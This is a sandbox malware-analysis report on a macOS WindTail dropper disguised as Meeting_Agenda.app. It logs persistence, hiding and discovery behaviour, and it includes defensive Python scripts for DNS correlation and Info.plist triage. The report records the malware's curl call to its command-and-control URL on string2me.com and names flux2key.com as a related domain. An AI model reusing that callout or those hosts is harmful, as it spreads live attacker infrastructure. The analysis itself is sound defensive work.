Analysis Report Meeting_Agenda.zip

Overview

General Information

Joe Sandbox Version: 25.0.0
Analysis ID: 66291
Start date: 24.12.2018
Start time: 09:33:49
Joe Sandbox Product: Cloud
Overall analysis duration: 0h 6m 0s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Meeting_Agenda.zip
Cookbook file name: defaultmacfilecookbook.jbs
Analysis system description: Mac Mini, High Sierra 10.13.2 (MS Office 16.9, Java 1.8.0_25)
Detection: MAL
Classification: mal60.troj.evad.macZIP@0/11@5/0

Detection

Strategy  | Score | Range   | Reporting      | Whitelisted | Detection
Threshold | 60    | 0 - 100 | Report FP / FN | false       | malicious

Analysis Advice

None of the domains contacted by the sample resolve (both queries returned SERVFAIL). The sample is likely an old dropper whose infrastructure no longer works, so the network behavior recorded here is incomplete: the curl request to string2me.com never reached a server, and any second-stage payload was not observed.



Mitre Att&ck Matrix

Techniques are listed per tactic. A bracketed number is the report's hit-count badge as extracted; entries without a number are the matrix's standard placeholder techniques with no hits for this sample.

Initial Access: Valid Accounts; Replication Through Removable Media; Drive-by Compromise
Execution: Scripting [1]; Service Execution; Windows Management Instrumentation
Persistence: Hidden Files and Directories [21]; Port Monitors; Accessibility Features
Privilege Escalation: Port Monitors; Accessibility Features; Path Interception
Defense Evasion: Hidden Files and Directories [21]; Scripting [1]; Code Signing [2]
Credential Access: Credential Dumping; Network Sniffing; Input Capture
Discovery: System Information Discovery [11]; Application Window Discovery; Query Registry
Lateral Movement: Application Deployment Software; Remote Services; Windows Remote Management
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive
Exfiltration: Data Compressed; Exfiltration Over Other Network Medium; Automated Exfiltration
Command and Control: Standard Non-Application Layer Protocol [1]; Remote Access Tools [1]; Standard Application Layer Protocol [11]

Signature Overview



Networking:

Connects to IPs without corresponding DNS lookups
Source: unknown | TCP traffic detected without corresponding DNS query: 17.253.55.204
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Source: unknown | DNS traffic detected: query: flux2key.com, reply code: Server failure (2)
Source: unknown | DNS traffic detected: query: string2me.com, reply code: Server failure (2)
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: flux2key.com
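The two networking signatures above are simple correlations over the capture: a TCP connection whose destination was never returned by a DNS answer, and a domain that was queried but only ever got a failure reply. The following script reproduces that logic. It is an added example, not Joe Sandbox code; the event list is constructed by hand in a Zeek-like shape, with only the two domains, their SERVFAIL replies and the 17.253.55.204:80 connection taken from this report, plus an invented benign control entry (example.com resolving to the TEST-NET address 203.0.113.10) so the negative case is visible. Note the caveat the report itself supports: the behavior graph places 17.253.55.204 in an Apple-owned range, so a "TCP without DNS" hit is a lead to check, not proof of command-and-control; the same rule fires on hard-coded IPs and on names resolved before the capture started.

```python
from collections import defaultdict

# DNS reply codes as seen in the report ("Server failure (2)"). Code 0 with an
# empty answer section is treated as a failure to resolve as well.
RCODE_NAMES = {0: "NOERROR (no answers)", 2: "SERVFAIL", 3: "NXDOMAIN", 5: "REFUSED"}

# Constructed event log in capture order: (timestamp, kind, details).
# Only the two domains, their rcode 2 replies and the 17.253.55.204:80
# connection come from the report; the example.com entries are a benign
# control case (203.0.113.10 is a TEST-NET address, not a real host).
EVENTS = [
    (1.0, "dns", {"query": "flux2key.com", "rcode": 2, "answers": []}),
    (1.5, "dns", {"query": "string2me.com", "rcode": 2, "answers": []}),
    (2.0, "tcp", {"dst": "17.253.55.204", "dport": 80}),
    (3.0, "dns", {"query": "example.com", "rcode": 0, "answers": ["203.0.113.10"]}),
    (3.5, "tcp", {"dst": "203.0.113.10", "dport": 443}),
]


def correlate(events):
    """Replay events in time order and return the networking findings as strings."""
    resolved = {}              # ip -> first domain that resolved to it
    succeeded = set()          # domains with at least one answered query
    failed = defaultdict(set)  # domain -> rcodes of replies that carried no answer
    findings = []

    for _ts, kind, d in sorted(events, key=lambda e: e[0]):
        if kind == "dns":
            if d["rcode"] == 0 and d["answers"]:
                succeeded.add(d["query"])
                for ip in d["answers"]:
                    resolved.setdefault(ip, d["query"])
            else:
                failed[d["query"]].add(d["rcode"])
        elif kind == "tcp" and d["dst"] not in resolved:
            # "Connects to IPs without corresponding DNS lookups"
            findings.append(f"tcp to {d['dst']}:{d['dport']} without a prior DNS answer")

    # "Tries to resolve domain names, but no domain seems valid"
    dead = sorted(dom for dom in failed if dom not in succeeded)
    for dom in dead:
        names = ", ".join(RCODE_NAMES.get(r, f"rcode {r}") for r in sorted(failed[dom]))
        findings.append(f"{dom} queried but never resolved ({names})")
    if dead and not succeeded:
        findings.append("every queried domain failed (expired dropper behavior)")
    return findings


if __name__ == "__main__":
    for line in correlate(EVENTS):
        print("-", line)
```

Run it against a real capture by loading Zeek's dns.log (query, rcode, answers) and conn.log (id.resp_h, id.resp_p) into the same tuple shape; the replay is order-sensitive, so sort by timestamp before calling correlate().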

System Summary:

Classification label
Source: classification engine | Classification label: mal60.troj.evad.macZIP@0/11@5/0

Persistence and Installation Behavior:

Writes Mach-O files to untypical directories
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535) | 64-bit Mach-O written to unusual path: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode
Changes permissions of written Mach-O files
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535) | Permissions modified for written 64-bit Mach-O /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode: bits: - usr: rx grp: rx all: rwx
Creates hidden files, links and/or directories
Source: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 537) | Hidden file created: /Users/henry/Library/Meeting_Agenda.app/Contents/Resources/.dat.nosync0219.V8cWwQ
Executes commands using a shell command-line interpreter
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535) | Shell command executed: /bin/sh -c open -a /Users/henry/Library/Meeting_Agenda.app
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)
Source: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 537) | Curl executable: /usr/bin/curl -> /usr/bin/curl string2me.com/qgHUDRZiYhOqQiN/kESklNvxsNZQcPl.php
Opens applications that may have been created by the sample
Source: /bin/sh (PID: 536) | Application opened: open -a /Users/henry/Library/Meeting_Agenda.app
Reads launchservices plist files
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535) | Launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535) | Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/bin/open (PID: 536) | Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 537) | Launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Source: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 537) | Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Reads user launchservices plist file containing default apps for corresponding file types
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535) | Preferences launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Source: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 537) | Preferences launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Uses CFNetwork bundle containing interfaces for network communication (HTTP, sockets, and Bonjour)
Source: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 537) | CFNetwork info plist opened: /System/Library/Frameworks/CFNetwork.framework/Resources/Info.plist
Writes 64-bit Mach-O files to disk
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535) | File written: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode
Writes RTF files to disk
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535) | File written: /Users/henry/Library/Meeting_Agenda.app/Contents/Resources/en.lproj/Credits.rtf
Writes icon files to disk
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535) | File written: /Users/henry/Library/Meeting_Agenda.app/Contents/Resources/WXBN.icns
App bundle is code signed
Source: Submitted file: Meeting_Agenda.zip | CodeResources XML file: CodeResources
Submitted sample is a bundle that is signed
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535) | CodeSignature CodeResources file read: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/_CodeSignature/CodeResources
Uses AppleKeyboardLayouts bundle containing keyboard layouts
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535) | AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 537) | AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Writes property list (.plist) files to disk
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535) | XML plist file created: /Users/henry/Library/Meeting_Agenda.app/Contents/_CodeSignature/CodeResources
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535) | XML plist file created: /Users/henry/Library/Meeting_Agenda.app/Contents/Info.plist
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535) | Binary plist file created: /Users/henry/Library/Meeting_Agenda.app/Contents/Resources/en.lproj/MainMenu.nib

Hooking and other Techniques for Hiding and Protection:

Contains functionality to launch an application without a Dock icon (i.e. hidden from the user)
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535) | XML plist file created with NSUIElement = 1: /Users/henry/Library/Meeting_Agenda.app/Contents/Info.plist
Contains functionality to register custom URL schemes (potentially used for hidden execution via browsers)
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535) | XML plist file created with CFBundleURLSchemes: /Users/henry/Library/Meeting_Agenda.app/Contents/Info.plist
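Both indicators in this section live in the dropped bundle's Info.plist, and the earlier section shows the bundle itself was copied to ~/Library with an executable (usrnode) whose name does not match the bundle name. The script below is an added triage example, not Joe Sandbox code: it parses an Info.plist for LSUIElement/NSUIElement and CFBundleURLSchemes, checks the executable and install-location mismatches, and walks a directory for .app bundles to apply the same checks. The embedded plist is constructed to mirror the keys the report names; the bundle identifier, URL-type name and scheme string in it are placeholders, not values recovered from the sample.

```python
import os
import plistlib
import posixpath

# Constructed sample: the keys mirror what the report says the dropped
# Info.plist contains (NSUIElement = 1 and a CFBundleURLSchemes entry) and the
# executable name usrnode from the dropped-file paths. The bundle identifier,
# URL name and scheme string are placeholders, not values from the sample.
SAMPLE_INFO_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
    <key>CFBundleExecutable</key><string>usrnode</string>
    <key>CFBundleIdentifier</key><string>com.example.placeholder</string>
    <key>CFBundleName</key><string>Meeting_Agenda</string>
    <key>NSUIElement</key><string>1</string>
    <key>CFBundleURLTypes</key>
    <array>
        <dict>
            <key>CFBundleURLName</key><string>placeholder</string>
            <key>CFBundleURLSchemes</key>
            <array><string>example-scheme</string></array>
        </dict>
    </array>
</dict>
</plist>
"""


def _is_set(value):
    """LSUIElement/NSUIElement may be stored as <true/>, <integer>1</integer> or <string>1</string>."""
    if value is True or value == 1:
        return True
    return str(value).strip().lower() in ("1", "true", "yes")


def url_schemes(info):
    """Collect every scheme under CFBundleURLTypes[*].CFBundleURLSchemes."""
    schemes = []
    for url_type in info.get("CFBundleURLTypes") or []:
        schemes.extend(url_type.get("CFBundleURLSchemes") or [])
    return schemes


def triage_bundle(bundle_path, info_plist_bytes):
    """Return a list of human-readable findings for one .app bundle."""
    info = plistlib.loads(info_plist_bytes)
    findings = []

    # "Launch without a Dock icon": LSUIElement is the current key,
    # NSUIElement the legacy spelling the report observed.
    if _is_set(info.get("LSUIElement")) or _is_set(info.get("NSUIElement")):
        findings.append("runs without a Dock icon (LSUIElement/NSUIElement = 1)")

    # "Registers custom URL schemes".
    schemes = url_schemes(info)
    if schemes:
        findings.append("registers custom URL schemes: " + ", ".join(schemes))

    # Executable name that differs from the bundle name (usrnode vs Meeting_Agenda).
    bundle_name = posixpath.basename(bundle_path.rstrip("/"))
    if bundle_name.endswith(".app"):
        bundle_name = bundle_name[:-4]
    exe = info.get("CFBundleExecutable", "")
    if exe and exe != bundle_name:
        findings.append(f"executable {exe!r} does not match bundle name {bundle_name!r}")

    # Bundle copied under a user's ~/Library rather than /Applications.
    parts = bundle_path.split("/")
    if len(parts) > 4 and parts[1] == "Users" and parts[3] == "Library":
        findings.append("bundle is installed under ~/Library, not /Applications")
    return findings


def scan_for_bundles(root):
    """Walk root (e.g. os.path.expanduser('~/Library')) and triage every .app found."""
    results = {}
    for dirpath, dirnames, _ in os.walk(root):
        for name in list(dirnames):
            if not name.endswith(".app"):
                continue
            bundle = os.path.join(dirpath, name)
            try:
                with open(os.path.join(bundle, "Contents", "Info.plist"), "rb") as fh:
                    results[bundle] = triage_bundle(bundle, fh.read())
            except (OSError, plistlib.InvalidFileException):
                results[bundle] = ["Info.plist missing or unreadable"]
            dirnames.remove(name)  # do not descend into the bundle itself
    return results


if __name__ == "__main__":
    for finding in triage_bundle("/Users/henry/Library/Meeting_Agenda.app", SAMPLE_INFO_PLIST):
        print("-", finding)
    for bundle, findings in scan_for_bundles(os.path.expanduser("~/Library")).items():
        if findings:
            print(bundle, "->", "; ".join(findings))
```

A matching bundle is only a lead: plenty of legitimate helper apps set LSUIElement or register URL schemes. For a hit, pair the plist findings with the signature facts from the section above: the report says the bundle is signed, so run codesign -dv --verbose=4 on it to see which identity signed it and spctl --assess --type execute to see whether Gatekeeper would still accept it, since a valid signature from a throwaway developer identity is consistent with, not evidence against, the malicious verdict.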

Language, Device and Operating System Detection:

Reads the system's hostname
Source: /bin/sh (PID: 536) | Sysctl requested: kern.hostname (1.10)
Source: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 537) | Sysctl requested: kern.hostname (1.10)
Reads the system or server version plist file
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535) | System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/open (PID: 536) | System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 537) | System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist

Remote Access Functionality:

Detected macOS WindTail
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535) | IOC file dropped: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode


Runtime Messages

Command: open
Exit Code: 0
Exit Code Info: (none)
Killed: False
Standard Output: (empty)
Standard Error: (empty)

Behavior Graph

Behavior Graph ID: 66291 | Sample: Meeting_Agenda.zip | Start date: 24/12/2018 | Architecture: MAC | Score: 60

Network nodes:
  • 17.253.55.204, port 49236 -> 80, APPLE-AUSTIN-AppleIncUS, United States
  • string2me.com
  • flux2key.com

Process tree (as rendered in the graph):
  • xpcproxy -> usrnode (first instance): dropped /Users/henry/Libra...tents/MacOS/usrnode (Mach-O) and /Users/henry/Libra...Contents/Info.plist (XML); started sh -> open
  • xpcproxy -> usrnode (second instance): started curl

Signatures attached to the first usrnode instance:
  • Detected macOS WindTail
  • Contains functionality to launch an application without a Dock icon (i.e. hidden from the user)
  • Contains functionality to register custom URL schemes (potentially used for hidden execution via browsers)
  • Writes Mach-O files to untypical directories

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches
